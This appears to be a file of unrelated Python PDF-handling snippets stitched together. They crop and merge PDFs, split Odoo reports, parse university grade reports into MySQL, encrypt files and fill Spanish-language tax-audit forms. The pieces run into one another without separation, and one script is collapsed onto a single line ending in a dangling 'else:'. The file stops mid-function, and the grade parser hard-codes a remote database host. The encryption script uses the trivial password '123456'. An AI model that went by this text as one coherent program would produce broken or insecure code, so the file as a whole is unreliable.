#!/usr/bin/python
"""Crop every page of the uncropped BrewPi HERMS drawing.

Reads ``BrewPi-HERMS-drawing-uncropped.pdf``, shrinks the media box of each
page and writes the result to ``BrewPi-HERMS-drawing.pdf``.  The statements
below run unchanged on Python 2 and Python 3.
"""
from PyPDF2 import PdfFileWriter, PdfFileReader

# ``open`` replaces the Python-2-only ``file`` builtin.  Both streams are
# managed by ``with`` so they are closed (and the output flushed) even when
# PyPDF2 raises.  The input has to stay open until ``output.write`` returns
# because the page objects are still backed by the input stream.
with open("BrewPi-HERMS-drawing-uncropped.pdf", "rb") as inputStream:
    input1 = PdfFileReader(inputStream)
    output = PdfFileWriter()

    numPages = input1.getNumPages()
    print("document has %s pages." % numPages)

    for i in range(numPages):
        page = input1.getPage(i)
        print("%s %s" % (page.mediaBox.getUpperRight_x(),
                         page.mediaBox.getUpperRight_y()))
        # Cut 100 units off the top edge.
        page.mediaBox.upperRight = (
            page.mediaBox.getUpperRight_x(),
            page.mediaBox.getUpperRight_y() - 100
        )
        print("%s %s" % (page.mediaBox.getLowerLeft_x(),
                         page.mediaBox.getLowerLeft_y()))
        # Despite its name this value becomes the new *lower* y coordinate.
        # It is derived from the already reduced top edge; the first page
        # gets a different offset than the following ones.
        if i == 0:
            upperLeft = page.mediaBox.getUpperLeft_y() / 4 * 3 - 60
        else:
            upperLeft = page.mediaBox.getUpperLeft_y() / 4 * 3 + 60
        page.mediaBox.lowerLeft = (
            page.mediaBox.getLowerLeft_x(),
            upperLeft
        )
        output.addPage(page)

    with open("BrewPi-HERMS-drawing.pdf", "wb") as outputStream:
        output.write(outputStream)
def bind(path, title, meta=None, verbose=False):
    '''Concatenate all PDF files from a folder into a single file.

    Files are merged in sorted name order.  A file whose MD5 digest equals
    that of an earlier file is reported and skipped.  After every document
    with an odd page count a blank page is appended.

    path: where to search for chapters and save the final PDF file
    title: name of the final PDF file (only its first 30 characters are
        used; ``.pdf`` is appended when the truncated title lacks it)
    meta: dict to provide metadata to be written into the pdf; keys that do
        not start with ``/`` get that prefix.  The dict is not modified.
    verbose: when false, PyPDF2 warnings are redirected to ``os.devnull``

    Returns 1 when the target file already exists (nothing is written),
    otherwise 0.

    from: https://www.binpress.com/tutorial/manipulating-pdfs-with-python/167
    '''
    title = title[0:30]
    filename = title if title.endswith('.pdf') else title + '.pdf'
    filepath = os.path.join(path, filename)
    if os.path.isfile(filepath):
        print(
            'Target file already exists. Aborting concatenation of PDF files!')
        return 1

    merger = PdfFileWriter()
    # TODO parse the meta meta from the webpage and combine with user input
    if meta:
        # Build a fresh dict: renaming keys of ``meta`` while iterating over
        # it is unsafe on Python 3 and would also alter the caller's object.
        info = {(k if k.startswith('/') else '/' + k): v
                for k, v in meta.items()}
        merger.addMetadata(info)
    # TODO add cover page from TIFF, not possible with PyPDF2

    files = sorted(x for x in os.listdir(path) if x.endswith('.pdf'))
    file_handles = []
    seen_digests = set()
    devnull = None
    try:
        if not verbose:
            # One shared sink for all readers instead of one leaked handle
            # per input file.
            devnull = open(os.devnull, 'w')
        for fname in files:
            fil = open(os.path.join(path, fname), 'rb')
            # Registered immediately so the ``finally`` clause closes it on
            # every path.  Sources must stay open until the merged file has
            # been written.
            file_handles.append(fil)
            dig = hashlib.md5(fil.read()).hexdigest()
            if dig in seen_digests:
                print('Duplicate detected: {0}'.format(fname))
                continue
            seen_digests.add(dig)
            if verbose:
                doc = PdfFileReader(fil)
            else:
                doc = PdfFileReader(fil, warndest=devnull)
            merger.appendPagesFromReader(doc)
            if doc.numPages % 2 == 1:
                merger.addBlankPage()
        with open(filepath, 'wb') as out:
            merger.write(out)
    finally:
        for fh in file_handles:
            fh.close()
        if devnull is not None:
            devnull.close()

    print("Saved concatenated PDF files as '{0}' in '{1}'".format(
        filename, os.path.abspath(path)))
    return 0
def _post_pdf(self, save_in_attachment, pdf_content=None, res_ids=None):
    '''Merge the existing attachments by adding one by one the content of the attachments
    and then, we add the pdf_content if exists. Create the attachments for each record individually
    if required.

    :param save_in_attachment: The retrieved attachments as map record.id -> attachment_id.
    :param pdf_content: The pdf content newly generated by wkhtmltopdf.
    :param res_ids: the ids of record to allow postprocessing. ``None`` is treated as "no records".
    :return: The pdf content of the merged pdf.
    '''

    def close_streams(streams):
        # Best-effort cleanup: a stream that fails to close must not hide the result.
        for stream in streams:
            try:
                stream.close()
            except Exception:
                pass

    # Check special case having only one record with existing attachment.
    # base64.decodebytes replaces decodestring, which was removed in Python 3.9.
    if len(save_in_attachment) == 1 and not pdf_content:
        return base64.decodebytes(list(save_in_attachment.values())[0].datas)

    # Without this, the default res_ids=None combined with pdf_content raised a TypeError below.
    res_ids = res_ids or []

    # Create a list of streams representing all sub-reports part of the final result
    # in order to append the existing attachments and the potentially modified sub-reports
    # by the postprocess_pdf_report calls.
    streams = []

    # In wkhtmltopdf has been called, we need to split the pdf in order to call the postprocess method.
    if pdf_content:
        pdf_content_stream = io.BytesIO(pdf_content)
        # Build a record_map mapping id -> record
        record_map = {r.id: r for r in self.env[self.model].browse([res_id for res_id in res_ids if res_id])}

        # If no value in attachment or no record specified, only append the whole pdf.
        if not record_map or not self.attachment:
            streams.append(pdf_content_stream)
        else:
            if len(res_ids) == 1:
                # Only one record, so postprocess directly and append the whole pdf.
                if res_ids[0] in record_map and not res_ids[0] in save_in_attachment:
                    new_stream = self.postprocess_pdf_report(record_map[res_ids[0]], pdf_content_stream)
                    # If the buffer has been modified, mark the old buffer to be closed as well.
                    if new_stream and new_stream != pdf_content_stream:
                        close_streams([pdf_content_stream])
                        pdf_content_stream = new_stream
                streams.append(pdf_content_stream)
            else:
                # In case of multiple docs, we need to split the pdf according the records.
                # To do so, we split the pdf based on outlines computed by wkhtmltopdf.
                # An outline is a <h?> html tag found on the document. To retrieve this table,
                # we look on the pdf structure using pypdf to compute the outlines_pages that is
                # an array like [0, 3, 5] that means a new document start at page 0, 3 and 5.
                reader = PdfFileReader(pdf_content_stream)
                if reader.trailer['/Root'].get('/Dests'):
                    outlines_pages = sorted(
                        [outline.getObject()[0] for outline in reader.trailer['/Root']['/Dests'].values()])
                    assert len(outlines_pages) == len(res_ids)
                    for i, num in enumerate(outlines_pages):
                        # Pages [num, to) belong to the i-th record.
                        to = outlines_pages[i + 1] if i + 1 < len(outlines_pages) else reader.numPages
                        attachment_writer = PdfFileWriter()
                        for j in range(num, to):
                            attachment_writer.addPage(reader.getPage(j))
                        stream = io.BytesIO()
                        attachment_writer.write(stream)
                        if res_ids[i] and res_ids[i] not in save_in_attachment:
                            new_stream = self.postprocess_pdf_report(record_map[res_ids[i]], stream)
                            # If the buffer has been modified, mark the old buffer to be closed as well.
                            if new_stream and new_stream != stream:
                                close_streams([stream])
                                stream = new_stream
                        streams.append(stream)
                    close_streams([pdf_content_stream])
                else:
                    # If no outlines available, do not save each record
                    streams.append(pdf_content_stream)

    # If attachment_use is checked, the records already having an existing attachment
    # are not been rendered by wkhtmltopdf. So, create a new stream for each of them.
    if self.attachment_use:
        for attachment_id in save_in_attachment.values():
            content = base64.decodebytes(attachment_id.datas)
            streams.append(io.BytesIO(content))

    # Build the final pdf.
    # If only one stream left, no need to merge them (and then, preserve embedded files).
    if len(streams) == 1:
        result = streams[0].getvalue()
    else:
        result = self._merge_pdfs(streams)

    # We have to close the streams after PdfFileWriter's call to write()
    close_streams(streams)
    return result
def read(input_pdf):
    """Print the document-information object PyPDF2 reports for ``input_pdf``.

    ``input_pdf`` is handed to ``PdfFileReader`` unchanged.
    """
    print(PdfFileReader(input_pdf).getDocumentInfo())
def get_pypdf_images(pdf_path):
    """Open the PDF at ``pdf_path`` and return what ``get_image_res`` yields for it.

    The file handle is not closed here; the reader passed on still refers to it.
    """
    stream = open(pdf_path, 'rb')
    reader = PdfFileReader(stream)
    return get_image_res(reader)
file = input('Enter the pdf name without ".pdf" \n') file = file + '.pdf' output = input( 'Enter the pdf name you want to give to your modified pdf file without ".pdf" \n' ) output = output + '.pdf' pages_to_remove = input('Enter the pages to be removed: ') pages_to_remove = pages_to_remove.split(' ') for page in range(len(pages_to_remove)): pages_to_remove[page] = abs(int(pages_to_remove[page])) given_pdf = PdfFileReader(file, 'r') num_pages = given_pdf.numPages if num_pages > 1: with open(output, 'wb') as new_file: writer = PdfFileWriter() for i in range(num_pages): if i + 1 in pages_to_remove: continue else: p = given_pdf.getPage(i) writer.addPage(p) writer.write(new_file) print('Removed Successfully!!') else:
from google.cloud import vision
from google.cloud.vision import types
from PIL import Image, ImageDraw, ImageFont
from collections import defaultdict
from spacy.tokens import Span
from tempfile import mkstemp
from shutil import move
from os import fdopen, remove
from enum import Enum
from math import *
from PyPDF2 import PdfFileWriter, PdfFileReader

# Load the PDF named by the first command-line argument.
file_name = str(sys.argv[1])
inputpdf = PdfFileReader(open(file_name, "rb"), strict=False)

# Everything up to and including the last '/' is the output directory; the
# file name without its last four characters is the common prefix.
last_slash = file_name.rfind('/')
out_dir = file_name[0:last_slash + 1]
prefix = file_name[last_slash + 1:-4]

# Write each page to "<out_dir><prefix>doc<i>.pdf" and remember the paths.
documents = []
for i in range(inputpdf.numPages):
    page_path = out_dir + prefix + "doc%s.pdf" % i
    output = PdfFileWriter()
    output.addPage(inputpdf.getPage(i))
    with open(page_path, "wb") as outputStream:
        output.write(outputStream)
    documents.append(page_path)

# Convert each page into an image
ee = extractjpg.extractor()
def parsePDF(path):
    """Download a grade-report PDF, extract its data and store it.

    The function deletes any existing ``data.csv`` and any local copy of
    ``path``, downloads the report again, extracts professors, courses,
    grades and GPAs page by page, inserts them into MySQL and finally passes
    the accumulated lists to ``outputCSV``.

    path: file name of the report.  All 5-digit groups found in it are
        concatenated to form the URL directory; the same name is used for
        the local download.

    NOTE(review): the nesting below was reconstructed from whitespace-mangled
    source.  The insert loops are placed inside the per-page ``if`` because
    they read ``profsSQL``/``coursesSQL``/``gradeSQL``/``gpaSQL``, which are
    only assigned there - confirm against the original file.
    """
    # DATABASE CONNECTION
    # NOTE(review): connection parameters are hard-coded and the connection is
    # never closed in the visible code.
    mydb = mysql.connector.connect(host='23.229.190.133',
                                   port='3306',
                                   user='******',
                                   password='******',
                                   database='TAMUHackClass')
    mycursor = mydb.cursor()
    # Clean old data file
    if os.path.exists('data.csv'):
        os.remove('data.csv')
    # Fetch new PDF
    if os.path.exists(path):
        os.remove(path)
    regex = "[0-9]{5}"
    # Named "year", but holds every 5-digit group of the file name joined together.
    year = ''.join(re.findall(regex, path))
    url = 'http://web-as.tamu.edu/gradereport/PDFReports/' + year + '/' + path
    response = urllib2.urlopen(url)
    # Copy the response body to disk until read() returns nothing.
    with open(path, 'wb') as f:
        while True:
            content = response.read()
            if not content:
                break
            f.write(content)
    with open(path, 'rb') as f:
        pdf = PdfFileReader(f)
        # Accumulators over all pages; these feed the CSV output.
        profs = []
        courses = []
        grades = []
        gpa = []
        for i in range(pdf.numPages):
            page = pdf.getPage(i)
            # print('Page type : {}'.format(str(type(page))))
            # Encode to ASCII to remove unintentional Unicode characters
            text = page.extractText().encode('ascii', 'ignore')
            # Check to make sure PDF page is not empty (has at least 1 course)
            if isNotEmpty(text):
                # Remove percentages, header text, and course and department totals
                text = cleanText(text)
                text = cleanHeader(text)
                # Group each data type into lists
                # Each extractor is called twice: once for the running list
                # and once for the per-page *SQL list used by the inserts.
                profs += extractProf(text)
                profsSQL = extractProf(text)
                courses += extractCourses(text)
                coursesSQL = extractCourses(text)
                # grades += extractGrades(text)
                gradeSQL = extractGrades(text)
                gpa += extractGPA(text)
                gpaSQL = extractGPA(text)
                # The loops below reuse ``i``; the outer ``range`` iterator is
                # unaffected by that rebinding.
                for i in range(len(profsSQL)):
                    s = profsSQL[i]
                    # Split at the last space: the left part is stored as last
                    # name, the right part as first name.  An entry without a
                    # space raises IndexError on the second line.
                    lastName = s.rsplit(' ', 1)[0]
                    firstName = s.rsplit(' ', 1)[1]
                    sql = "INSERT INTO Professors (Prof_id, Prof_FirstName, Prof_LastName) VALUES (null, %s, %s)"
                    val = (firstName, lastName)
                    mycursor.execute(sql, val)
                    # One commit per inserted row.
                    mydb.commit()
                    print(mycursor.rowcount, "record inserted.")
                for i in range(len(coursesSQL)):
                    c = coursesSQL[i]
                    # Fixed-width slices: chars 0-3 department, 5-7 course number.
                    dept = c[0:4]
                    courseNum = c[5:8]
                    print dept
                    print courseNum
                    sql = "INSERT INTO Classes (Class_id, Class_Dept, Course_No) VALUES (null, %s, %s)"
                    val = (dept, courseNum)
                    mycursor.execute(sql, val)
                    mydb.commit()
                    print(mycursor.rowcount, "record inserted.")
                for i in range(len(coursesSQL)):
                    c = coursesSQL[i]
                    dept = c[0:4]
                    courseNum = c[5:8]
                    sectionNum = c[9:12]
                    gpaQ = gpaSQL[i]
                    # for j in range(len(gradeSQL)):
                    # gradeSQL is read in strides of 12 values per course;
                    # offsets 5 and 11 are not used here.
                    # NOTE(review): presumably those are totals - verify
                    # against extractGrades.
                    aGrade = gradeSQL[i * 12]
                    bGrade = gradeSQL[i * 12 + 1]
                    cGrade = gradeSQL[i * 12 + 2]
                    dGrade = gradeSQL[i * 12 + 3]
                    fGrade = gradeSQL[i * 12 + 4]
                    iGrade = gradeSQL[i * 12 + 6]
                    sGrade = gradeSQL[i * 12 + 7]
                    uGrade = gradeSQL[i * 12 + 8]
                    qGrade = gradeSQL[i * 12 + 9]
                    xGrade = gradeSQL[i * 12 + 10]
                    # Instructor_ID and Class_id are the literal 001 for every
                    # row; year and term are fixed in ``val`` below.
                    sql = "INSERT INTO Sections (Section_ID, Section_Name, Course_Num, Section_Num, Instructor_ID, A_Grade, " \
                          "B_Grade, C_Grade, D_Grade, F_Grade, GPA, I_Grade, S_Grade, U_Grade, Q_Grade, X_Grade, " \
                          "Section_year, Section_term, Class_id) VALUES (null, %s, %s, %s, 001, %s, %s, %s, %s, %s, %s, %s, %s, %s," \
                          "%s, %s, %s, %s, 001)"
                    val = (dept, courseNum, sectionNum, aGrade, bGrade, cGrade,
                           dGrade, fGrade, gpaQ, iGrade, sGrade, uGrade, qGrade,
                           xGrade, 2018, "Spring")
                    mycursor.execute(sql, val)
                    mydb.commit()
                    print(mycursor.rowcount, "record inserted.")
    # Output lists to CSV
    outputCSV(profs, courses, gpa)
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2021/5/2 9:30 AM
# @Author : silianpan
# @Site :
# @File : __init__.py.py
# @Software: PyCharm
"""Write a password-protected copy of every ``*.PDF`` file in ``src_folder``."""
from pathlib import Path
from PyPDF2 import PdfFileReader, PdfFileWriter

src_folder = Path('/Users/liupan/work/code/seal-python-tools/pdf_process/公告/')

# The matches are collected into a list before any output is written, so the
# copies created below are never part of the iteration.
file_list = list(src_folder.glob('*.PDF'))

for pdf in file_list:
    inputfile = PdfFileReader(str(pdf))
    outputfile = PdfFileWriter()

    # Copy all pages, then encrypt the whole copy once.
    pageCount = inputfile.getNumPages()
    page = 0
    while page < pageCount:
        outputfile.addPage(inputfile.getPage(page))
        page += 1
    outputfile.encrypt('123456')

    # The copy is stored next to the source as "<stem>_secret.pdf".
    des_name = f'{pdf.stem}_secret.pdf'
    des_file = src_folder / des_name
    f_out = open(des_file, 'wb')
    try:
        outputfile.write(f_out)
    finally:
        f_out.close()
def loadFromStream(self, stream):
    """Create ``self.reader`` from ``stream``.

    When the module-level flag ``usepypdf2`` is truthy the reader is built
    with ``strict=False``; otherwise no extra argument is passed.
    """
    reader_options = {'strict': False} if usepypdf2 else {}
    self.reader = PdfFileReader(stream, **reader_options)
def apply_watermark_to_pdf_file(base_filename, complete_filename, annex_number):
    """Stamp an annex label on every page of a PDF and save the stamped copy.

    Each page gets the red text ``<annex_number>-<NNN>`` on a white box near
    its top centre, where ``NNN`` is the zero-padded page number reported by
    the reportlab canvas.  The copy is written to the module-level
    ``destination_folder`` under ``base_filename`` with
    `` - Bilageret <today>`` inserted before the first ``.pdf`` (or appended
    when the name contains no ``.pdf``).

    :param base_filename: file name (no directory) used to derive the output name.
    :param complete_filename: path of the PDF to read.
    :param annex_number: prefix of the label drawn on every page.
    :return: number of pages of the source document.
    """
    # Both files are context-managed: the source is closed even when stamping
    # fails, and the result is flushed and closed after writing.
    with open(complete_filename, 'rb') as original_pdf:
        # Error when using Strict: "Xref table not zero-indexed. ID numbers for objects will be corrected"
        pdf_reader = PdfFileReader(original_pdf, strict=False)
        num_pages = pdf_reader.numPages

        # Draw one overlay page per source page into an in-memory PDF.
        packet = io.BytesIO()
        can = canvas.Canvas(packet)
        for i in range(num_pages):
            media_box = pdf_reader.pages[i].mediaBox
            page_num = can.getPageNumber()
            can.setFont("Helvetica", 20)
            text = f'{annex_number}-{format(page_num, "03d")}'
            # Count number of characters and multiply to calculate the width. ( x * 10 )
            characters_in_annex_number = len(text)
            page_center = (int(media_box[2]) / 2) - (characters_in_annex_number * 5)
            page_top = int(media_box[3]) - 30
            # White background box first, then the red label on top of it.
            can.setFillColor(white)
            can.rect(page_center, page_top - 8,
                     characters_in_annex_number * 10, 30, fill=1, stroke=0)
            can.setFillColor(red)
            can.drawString(page_center, page_top, text)
            can.showPage()
        can.save()
        packet.seek(0)

        pdf_watermark_reader = PdfFileReader(packet)
        pdf_writer = PdfFileWriter()
        for page_index in range(num_pages):
            original_page = pdf_reader.getPage(page_index)
            original_page.mergePage(pdf_watermark_reader.getPage(page_index))
            pdf_writer.addPage(original_page)

        # Add "Bilageret" at the end of the filename.  ``find`` returns -1
        # when there is no ".pdf"; slicing with -1 would split off the last
        # character, so the suffix is appended at the very end instead.
        index = base_filename.find('.pdf')
        if index == -1:
            index = len(base_filename)
        base_filename_with_bilageret = (
            base_filename[:index]
            + f' - Bilageret {datetime.now().date()}'
            + base_filename[index:])

        result_path = os.path.join(destination_folder, base_filename_with_bilageret)
        with open(result_path, 'wb') as result_pdf:
            pdf_writer.write(result_pdf)

    # Return number of pages
    return num_pages
def cedula_hallazgo(documento):
    """Render the findings sheet for ``documento`` as a PDF download.

    A reportlab document with a header table, a findings table, the
    observations and the names of the acting auditor and supervisor is built
    in memory.  Its first page is copied into a PyPDF2 writer and written to
    an ``HttpResponse`` with an attachment disposition.

    :param documento: record providing ``codigo``, ``pst``,
        ``hallazgos_*``, ``fecha_notificacion`` and ``observaciones``.
    :return: the ``HttpResponse`` containing the PDF.
    """
    domicilio, gerente, supervisor, funcionarios, apoyo = documento_info(
        documento)
    output = PdfFileWriter()

    # create response object
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename=Cedula_de_Hallazgo.pdf'

    pdf_buffer = StringIO()
    doc = SimpleDocTemplate(pdf_buffer,
                            pagesize=letter,
                            rightMargin=72,
                            leftMargin=72,
                            topMargin=50,
                            bottomMargin=100)
    styles = getSampleStyleSheet()
    styles.add(ParagraphStyle(name='Center', alignment=TA_CENTER, fontSize=8))
    styles.add(ParagraphStyle(name='Justify', alignment=TA_JUSTIFY, fontSize=8))
    story = []

    # Logo scaled to a width of 1.25 inch; the height is derived from the
    # original proportions before the width is overwritten.
    logo = Image(os.path.join(settings.BASE_DIR, 'static', 'img', 'logo.png'))
    logo.drawHeight = 1.25 * inch * logo.drawHeight / logo.drawWidth
    logo.drawWidth = 1.25 * inch

    # Header table: logo / title / code, then taxpayer and subject rows.
    data = [[logo, '', '', '', '', ''],
            ['SUJETO PASIVO:', '', '', '', '', ''],
            ['MATERIA:', '', '', '', '', '']]
    data[0][2] = Paragraph(
        u'''<b>CEDULA DE HALLAZGOS<br/> Contribución Especial del 1% por la Presentación de<br/> Servicios Turísticos</b>''',
        styles["Center"])
    data[0][4] = documento.codigo
    data[1][1] = documento.pst.nombre_o_razon()
    data[1][3] = 'RIF: ' + documento.pst.rif
    data[2][1] = documento.hallazgos_materia
    data[2][3] = 'PERIODO: ' + documento.fecha_notificacion.strftime(
        "%d/%m/%Y")
    header_widths = [80, 30, 90, 90, 80, 80]
    header_style = [('GRID', (0, 0), (-1, -1), 0.25, colors.black),
                    ('ALIGN', (0, 0), (-1, 0), 'CENTER'),
                    ('VALIGN', (0, 0), (-1, -1), 'MIDDLE'),
                    ('FONTSIZE', (0, 0), (-1, -1), 8),
                    ('SPAN', (0, 0), (1, 0)),
                    ('SPAN', (2, 0), (3, 0)),
                    ('SPAN', (4, 0), (5, 0)),
                    ('SPAN', (1, 1), (2, 1)),
                    ('SPAN', (1, 2), (2, 2)),
                    ('SPAN', (3, 1), (5, 1)),
                    ('SPAN', (3, 2), (5, 2))]
    story.append(Table(data, colWidths=header_widths, style=header_style))
    story.append(Spacer(1, 12))

    # Findings table: heading row, an empty spacer row, then the content row.
    data = [['CONDICIÓN', 'CRITERIO', 'EFECTO', 'EVIDENCIA'],
            ['', '', '', ''],
            ['', '', '', '']]
    try:
        data[2][0] = Paragraph(documento.hallazgos_condicion, styles["Justify"])
        data[2][1] = Paragraph(documento.hallazgos_criterio, styles["Justify"])
        data[2][2] = Paragraph(documento.hallazgos_efecto, styles["Justify"])
        data[2][3] = Paragraph(documento.hallazgos_evidencia, styles["Justify"])
    except Exception:
        # Still best-effort: cells that could not be rendered stay empty.
        # ``Exception`` instead of a bare ``except`` lets SystemExit and
        # KeyboardInterrupt propagate.
        pass
    findings_style = [
        ('GRID', (0, 0), (-1, 0), 0.25, colors.black),
        ('GRID', (0, 2), (-1, 2), 0.25, colors.black),
        ('FONTSIZE', (0, 0), (-1, -1), 8),
        ('ALIGN', (0, 0), (-1, 0), 'CENTER'),
        ('BACKGROUND', (0, 0), (-1, 0), colors.grey),
        ('VALIGN', (0, 2), (-1, 2), 'TOP'),
    ]
    story.append(Table(data, colWidths=[95, 170, 81, 105], style=findings_style))
    story.append(Spacer(1, 12))

    ptext = 'Observaciones: <u>%s</u>' % documento.observaciones
    story.append(Paragraph(ptext, styles['Normal']))
    story.append(Spacer(1, 12))
    story.append(
        Paragraph('Fiscal Actuante: %s' % gerente.get_full_name(),
                  styles['Normal']))
    story.append(
        Paragraph('Supervisor: %s' % supervisor.get_full_name(),
                  styles['Normal']))
    doc.build(story)

    # Only the first page of the generated document is sent.
    watermark = PdfFileReader(pdf_buffer)
    output.addPage(watermark.getPage(0))
    output.write(response)
    return response
def constancia(documento):
    """Fill the ``CONSTANCIA.pdf`` template for ``documento`` and return it as a download.

    The taxpayer data, the address, the body text and the signature blocks
    are drawn on an overlay that is merged onto page 0 of the template.
    Signature drawing stops as soon as the returned y position drops to 114
    or below while officials are still pending; the remaining signatures are
    then drawn on a second overlay merged onto page index 3 of
    ``PROVIDENCIA.pdf``.

    :param documento: record providing ``pst`` and ``codigo``.
    :return: ``HttpResponse`` with the resulting PDF as attachment.
    """
    new_page = False
    start_funcionario = 0
    domicilio, gerente, supervisor, funcionarios, apoyo = documento_info(
        documento)
    texto = text_constancia(documento, supervisor, funcionarios)

    p = ParagraphStyle('test')
    p.textColor = 'black'
    p.alignment = TA_JUSTIFY
    p.fontSize = 10
    p.leading = 12
    if domicilio:
        para = Paragraph(unicode(domicilio), p)
    else:
        para = Paragraph(unicode("No tiene registro de domicilio"), p)
    para_texto = Paragraph(unicode(texto), p)

    output = PdfFileWriter()
    template_dir = os.path.join(settings.PDF_ROOT, 'fiscalizacion')

    # create response object
    response = HttpResponse(content_type='application/pdf')
    response['Content-Disposition'] = 'attachment; filename=Fiscalizacion_Constancia.pdf'

    # Template files have to stay open until ``output.write`` has run; they
    # are collected here so the ``finally`` clause closes every one of them.
    template_files = []
    try:
        constancia_file = open(os.path.join(template_dir, 'CONSTANCIA.pdf'), 'rb')
        template_files.append(constancia_file)
        template = PdfFileReader(constancia_file)

        overlay_buffer = StringIO()
        # create string buffer for PDF
        pdf = canvas.Canvas(overlay_buffer, pagesize=letter)
        pdf.drawString(220, 793, unicode(documento.pst.razon_social))
        pdf.drawString(220, 779, unicode(documento.pst.rif))
        if documento.pst.rtn is not None:
            pdf.drawString(220, 766, unicode(documento.pst.rtn))
        else:
            pdf.drawString(220, 766, u'S/RTN')
        pdf.drawString(80, 850, unicode(documento.codigo))
        para.wrapOn(pdf, 300, 50)
        para.drawOn(pdf, 220, 762 - para.height)
        para_texto.wrapOn(pdf, 450, 300)
        para_texto.drawOn(pdf, 80, 730 - para_texto.height)
        pasivo(pdf, 730 - para_texto.height)

        supervisor_end = supervisor_firma(pdf, 730 - para_texto.height,
                                          supervisor)
        last_index = len(funcionarios) - 1
        for index, funcionario in enumerate(funcionarios):
            supervisor_end = funcionario_firma(pdf, supervisor_end, funcionario)
            # Out of vertical room with officials still pending: continue
            # on an extra page starting with the next official.
            if supervisor_end <= 114 and index != last_index:
                new_page = True
                start_funcionario = index + 1
                break
        pdf.save()

        # put on watermark from buffer
        watermark = PdfFileReader(overlay_buffer)
        tmp = template.getPage(0)
        tmp.mergePage(watermark.getPage(0))
        overlay_buffer.seek(0)
        # add processed pdf page
        output.addPage(tmp)

        if new_page:
            overlay_buffer = StringIO()
            # create string buffer for PDF
            pdf = canvas.Canvas(overlay_buffer, pagesize=letter)
            supervisor_end = 850
            for funcionario in funcionarios[start_funcionario:]:
                supervisor_end = funcionario_firma(pdf, supervisor_end,
                                                   funcionario)
            pdf.save()
            # put on watermark from buffer
            watermark = PdfFileReader(overlay_buffer)
            providencia_file = open(
                os.path.join(template_dir, 'PROVIDENCIA.pdf'), 'rb')
            template_files.append(providencia_file)
            template = PdfFileReader(providencia_file)
            tmp = template.getPage(3)
            tmp.mergePage(watermark.getPage(0))
            overlay_buffer.seek(0)
            # add processed pdf page
            output.addPage(tmp)

        output.write(response)
    finally:
        for handle in template_files:
            handle.close()
    return response
def providencia(documento):
    """Fill the ``PROVIDENCIA.pdf`` template for ``documento`` and return it as a download.

    For every template page except the last one an overlay is drawn
    (taxpayer data, code, date, address, body text and - when there is
    enough vertical room - the signature/notification blocks) and merged onto
    that page.  When the body text leaves no room, the blocks are drawn on a
    second overlay that is merged onto page index 3 of the template.

    :param documento: record providing ``pst`` and ``codigo``.
    :return: ``HttpResponse`` with the resulting PDF as attachment.

    NOTE(review): the nesting was reconstructed from whitespace-mangled
    source.  The ``if new_page:`` block is placed inside the page loop because
    ``new_page`` is reset at the top of every iteration - confirm.
    """
    # Spanish month names indexed by month number.
    mes_letras = {
        1: 'Enero',
        2: 'Febrero',
        3: 'Marzo',
        4: 'Abril',
        5: 'Mayo',
        6: 'Junio',
        7: 'Julio',
        8: 'Agosto',
        9: 'Septiembre',
        10: 'Octubre',
        11: 'Noviembre',
        12: 'Diciembre',
    }

    def text_to_bold(text):
        """Wrap ``text`` in bold, size-12 paragraph markup followed by a line break."""
        return u'''<b><font size=12>{}</font></b> <br/>'''.format(text)

    def print_text_bold(text, x, y, pdf):
        """Draw ``text`` in bold on canvas ``pdf`` at position (x, y)."""
        p = ParagraphStyle('test')
        p.textColor = 'black'
        p.alignment = TA_LEFT
        p.fontSize = 8
        p.leading = 9
        para = Paragraph(text_to_bold(unicode(text)), p)
        para.wrapOn(pdf, 300, 50)
        para.drawOn(pdf, x, y)

    def get_fecha():
        """Return today's date as the Spanish dateline used on the document."""
        from datetime import date
        d = date.today()
        fecha = "Caracas, {dia_letra} ({dia}) de {mes} de {anyo}".format(
            dia_letra=NumToWord.get_month_words(d.day),
            dia=str(d.day),
            mes=mes_letras[d.month],
            anyo=str(d.year))
        return fecha

    domicilio, gerente, supervisor, funcionarios, apoyo = documento_info(
        documento)
    texto = text_providencia(supervisor, funcionarios, apoyo)
    p = ParagraphStyle('test')
    p.textColor = 'black'
    p.alignment = TA_LEFT
    p.fontSize = 10
    p.leading = 12
    para = Paragraph(text_to_bold(unicode(domicilio)), p)
    para_texto = Paragraph(unicode(texto), p)
    output = PdfFileWriter()
    # NOTE(review): the handle opened with file() is never closed in the
    # visible code.
    input = PdfFileReader(
        file(
            os.path.join(settings.PDF_ROOT, 'fiscalizacion',
                         'PROVIDENCIA.pdf'), 'rb'))
    # create response object
    response = HttpResponse(content_type='application/pdf')
    response[
        'Content-Disposition'] = 'attachment; filename=Fiscalizacion_Providencia.pdf'
    fecha = get_fecha()
    # get number of pages
    num_pages = input.getNumPages()
    # The last template page is not iterated; it is only used (as index 3)
    # by the overflow branch below.
    for page in xrange(num_pages - 1):
        new_page = False
        buffer = StringIO()
        # create string buffer for PDF
        pdf = canvas.Canvas(buffer, pagesize=letter)
        # The page with index 2 uses slightly shifted coordinates.
        fecha_codigo_y = 7 if page == 2 else 0
        y_minus = 15 if page == 2 else 0
        print_text_bold(unicode(documento.pst.razon_social), 220,
                        770 + y_minus, pdf)
        print_text_bold(unicode(documento.pst.rif), 220, 752 + y_minus, pdf)
        if documento.pst.rtn != None:
            text_rtn = unicode(documento.pst.rtn)
        else:
            text_rtn = u'S/RTN'
        print_text_bold(text_rtn, 220, 737 + y_minus, pdf)
        pdf.drawString(80, 830 + (y_minus - fecha_codigo_y),
                       unicode(documento.codigo))
        pdf.drawString(335, 830 + (y_minus - fecha_codigo_y), unicode(fecha))
        para.wrapOn(pdf, 300, 50)
        para.drawOn(pdf, 220, 695 + y_minus)
        para_texto.wrapOn(pdf, 450, 300)
        para_texto.drawOn(pdf, 80, 675 - para_texto.height)
        # manager data
        # Draw the blocks below the body text only if the text ends above
        # y = 230; otherwise defer them to an extra page.
        if 675 - para_texto.height > 230:
            gaceta_end = gaceta(pdf, 675 - para_texto.height, gerente)
            notificacion(pdf, gaceta_end)
            label(pdf, gaceta_end, page)
        else:
            new_page = True
        pdf.save()
        # put on watermark from buffer
        watermark = PdfFileReader(buffer)
        tmp = input.getPage(page)
        tmp.mergePage(watermark.getPage(0))
        buffer.seek(0)
        # add processed pdf page
        output.addPage(tmp)
        if new_page:
            buffer = StringIO()
            # create string buffer for PDF
            pdf = canvas.Canvas(buffer, pagesize=letter)
            # box that contains the pst data
